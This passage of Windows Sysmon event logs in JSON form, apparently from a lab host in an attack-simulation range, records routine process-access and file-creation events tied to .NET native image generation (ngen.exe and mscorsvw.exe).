{"EventTime":"2020-08-01 08:05:50","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7621,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:50.116\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-225E-5F25-0000-0010511E0E00}\r\nTargetProcessId: 4372\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:50.116","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-225E-5F25-0000-0010511E0E00}","TargetProcessId":"4372","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:50","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7622,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:50.194\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-225E-5F25-0000-0010A7220E00}\r\nTargetProcessId: 2944\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:50.194","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-225E-5F25-0000-0010A7220E00}","TargetProcessId":"2944","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:50","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7623,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:50.194\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2340\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-225E-5F25-0000-0010A7220E00}\r\nTargetProcessId: 2944\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:50.194","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2340","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-225E-5F25-0000-0010A7220E00}","TargetProcessId":"2944","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:05:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:50","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7624,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:50.194\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-225E-5F25-0000-0010A7220E00}\r\nTargetProcessId: 2944\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:50.194","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-225E-5F25-0000-0010A7220E00}","TargetProcessId":"2944","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:50","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7625,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:50.319\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 4488\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-2231-5F25-0000-001004820B00}\r\nTargetProcessId: 2624\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:50.319","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"4488","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-2231-5F25-0000-001004820B00}","TargetProcessId":"2624","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:50","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7626,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:50.319\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 772\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2231-5F25-0000-001004820B00}\r\nTargetProcessId: 2624\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:50.319","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"772","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2231-5F25-0000-001004820B00}","TargetProcessId":"2624","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:05:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:50","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7627,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:50.335\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-225E-5F25-0000-001062270E00}\r\nTargetProcessId: 2624\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:50.335","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-225E-5F25-0000-001062270E00}","TargetProcessId":"2624","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:54","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":7628,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 08:05:54.007\r\nProcessGuid: {41C8662E-225E-5F25-0000-001062270E00}\r\nProcessId: 2624\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\a40-0\\System.Activities.dll\r\nCreationUtcTime: 2020-08-01 08:05:54.007","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 08:05:54.007","ProcessGuid":"{41C8662E-225E-5F25-0000-001062270E00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\a40-0\\System.Activities.dll","CreationUtcTime":"2020-08-01 08:05:54.007","EventReceivedTime":"2020-08-01 08:05:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:54","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7629,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:54.132\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-2231-5F25-0000-0010AB850B00}\r\nTargetProcessId: 2996\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 